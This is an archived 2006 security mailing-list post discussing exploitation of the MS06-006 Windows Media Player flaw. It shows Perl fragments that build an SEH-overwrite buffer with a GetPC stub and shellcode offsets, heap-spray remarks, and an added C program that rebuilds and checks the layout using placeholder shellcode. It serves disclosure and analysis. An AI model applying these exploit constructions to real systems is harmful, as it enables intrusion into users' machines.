Message-ID: <200602170820.28319.fdlist@digitaloffense.net>
Date: Fri Feb 17 14:20:39 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-0[0]6 Windows Media Player Exploitation [CODE]

On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.  
[ snip ] 

> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a00000 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

> This should also be (theoretically) version-independent.  Thanks to the
> similarities of the heap management APIs and the fact that most DLLs
> from MS use high bases, I'd bet money that this works across WMP
> versions on anything from NT 4.0 to 2003. 

I ran into problems with Skylined's alphanumeric GetPC code - on Windows 
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our 
shellcode is one, since we smash SEH on the way down). Did some fancy 
8086 instructions to get around this (thanks vlad902 - the human 
assembler), so, fwiw:

my $getpc = 
"\x58\x58\x58".         # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292918
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901 (net effect: add eax,0x17)
"\x50\x59";             # push eax, pop ecx

substr($pattern, 2082, 4, "ABC=");           # nSEH: inc ecx, inc edx, inc ebx, cmp eax,imm32
substr($pattern, 2086, 4, pack('V', $addr)); # handler address; the cmp above swallows it as its imm32
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

> It's likely, as well, that 
> this one technique works on any script-enabled browser that supports
> the plugin with the same results.

I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some 
more time I will play with the heap spray method and see if that works 
cross-browser/os/version as well. Looks like heap spray is the way to go, 
at least for Firefox...

> 'Nuff teasing.  Code attached.  It is important to note that you should
> read the inline disclaimer *BEFORE* using the code.

Thanks for sharing!

-HD
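
Added example (editor's own code, not HD's or Matthew's): a small C program that rebuilds the layout above with the same offsets and then walks the instruction boundaries from nSEH with a length decoder covering just the opcodes involved. It shows why the handler dword at 2086 is never executed as code: the 0x3d ('=') that ends "ABC=" is CMP EAX,imm32, so the four address bytes become its immediate and control falls through into the GetPC stub at 2090; it also confirms that the add/sub pair collapses to adding 0x17 to whatever was popped. The 4096-byte pattern size, the 0x04a00000 handler value (borrowed from the heap-spray region as a placeholder) and the int3 filler shellcode are constructed assumptions, not values from the post.

```c
/* Added example: checks the nSEH/handler/GetPC layout from the post. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Offsets taken from the substr() calls in the post. */
#define NSEH_OFF  2082u
#define SEH_OFF   2086u
#define GETPC_OFF 2090u
#define BUF_LEN   4096u          /* assumed total pattern size */
#define HANDLER   0x04a00000u    /* assumed handler address (placeholder) */

/* The GetPC stub exactly as posted. */
static const uint8_t getpc[] = {
    0x58, 0x58, 0x58,             /* pop eax ; pop eax ; pop eax */
    0x05, 0x18, 0x29, 0x29, 0x29, /* add eax, 0x29292918 */
    0x2d, 0x01, 0x29, 0x29, 0x29, /* sub eax, 0x29292901 */
    0x50, 0x59                    /* push eax ; pop ecx */
};

/* Constructed placeholder shellcode: four int3s. */
static const uint8_t shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

static uint8_t pattern[BUF_LEN];

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Same construction as the Perl substr() sequence; returns shellcode offset. */
size_t build_pattern(uint32_t handler)
{
    memset(pattern, 'A', sizeof pattern);
    memcpy(pattern + NSEH_OFF, "ABC=", 4);      /* inc ecx; inc edx; inc ebx; cmp eax,imm32 */
    pattern[SEH_OFF + 0] = (uint8_t)handler;    /* pack('V', $addr): little-endian dword */
    pattern[SEH_OFF + 1] = (uint8_t)(handler >> 8);
    pattern[SEH_OFF + 2] = (uint8_t)(handler >> 16);
    pattern[SEH_OFF + 3] = (uint8_t)(handler >> 24);
    memcpy(pattern + GETPC_OFF, getpc, sizeof getpc);
    memcpy(pattern + GETPC_OFF + sizeof getpc, shellcode, sizeof shellcode);
    return GETPC_OFF + sizeof getpc;
}

/* Instruction length for the only opcodes the stub uses; 0 = not modelled. */
size_t insn_len(uint8_t op)
{
    if (op >= 0x40 && op <= 0x4f) return 1;               /* inc/dec r32 */
    if (op >= 0x50 && op <= 0x5f) return 1;               /* push/pop r32 */
    if (op == 0x05 || op == 0x2d || op == 0x3d) return 5; /* add/sub/cmp eax,imm32 */
    return 0;
}

/* Walk instruction boundaries from nSEH to the end of the stub. Returns the
 * offset execution reaches (the shellcode start), or 0 on an unmodelled byte.
 * *inside_handler is set if any boundary lands inside the handler dword. */
size_t trace_from_nseh(int *inside_handler)
{
    size_t off = NSEH_OFF, end = GETPC_OFF + sizeof getpc;
    *inside_handler = 0;
    while (off < end) {
        size_t n = insn_len(pattern[off]);
        if (n == 0) return 0;
        if (off >= SEH_OFF && off < SEH_OFF + 4) *inside_handler = 1;
        off += n;
    }
    return off;
}

size_t decode_reaches(void)    { int b; return trace_from_nseh(&b); }
int    handler_executed(void)  { int b; trace_from_nseh(&b); return b; }
uint32_t handler_readback(void) { return le32(pattern + SEH_OFF); }

/* The add/sub pair is equivalent to a single "add eax, delta". */
uint32_t getpc_delta(void)
{
    return le32(getpc + 4) - le32(getpc + 9);
}

int main(void)
{
    size_t sc = build_pattern(HANDLER);
    size_t reached = decode_reaches();
    printf("shellcode at %zu, decode from nSEH reaches %zu, handler bytes executed: %s\n",
           sc, reached, handler_executed() ? "yes" : "no");
    printf("handler dword 0x%08x intact; stub adds 0x%x to the popped value\n",
           (unsigned)handler_readback(), (unsigned)getpc_delta());
    return (reached == sc && !handler_executed()) ? 0 : 1;
}
```

The decoder is deliberately tiny: it only needs to prove that no instruction boundary falls on bytes 2086-2089, which is what lets an arbitrary handler address sit inline in the executed stream.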
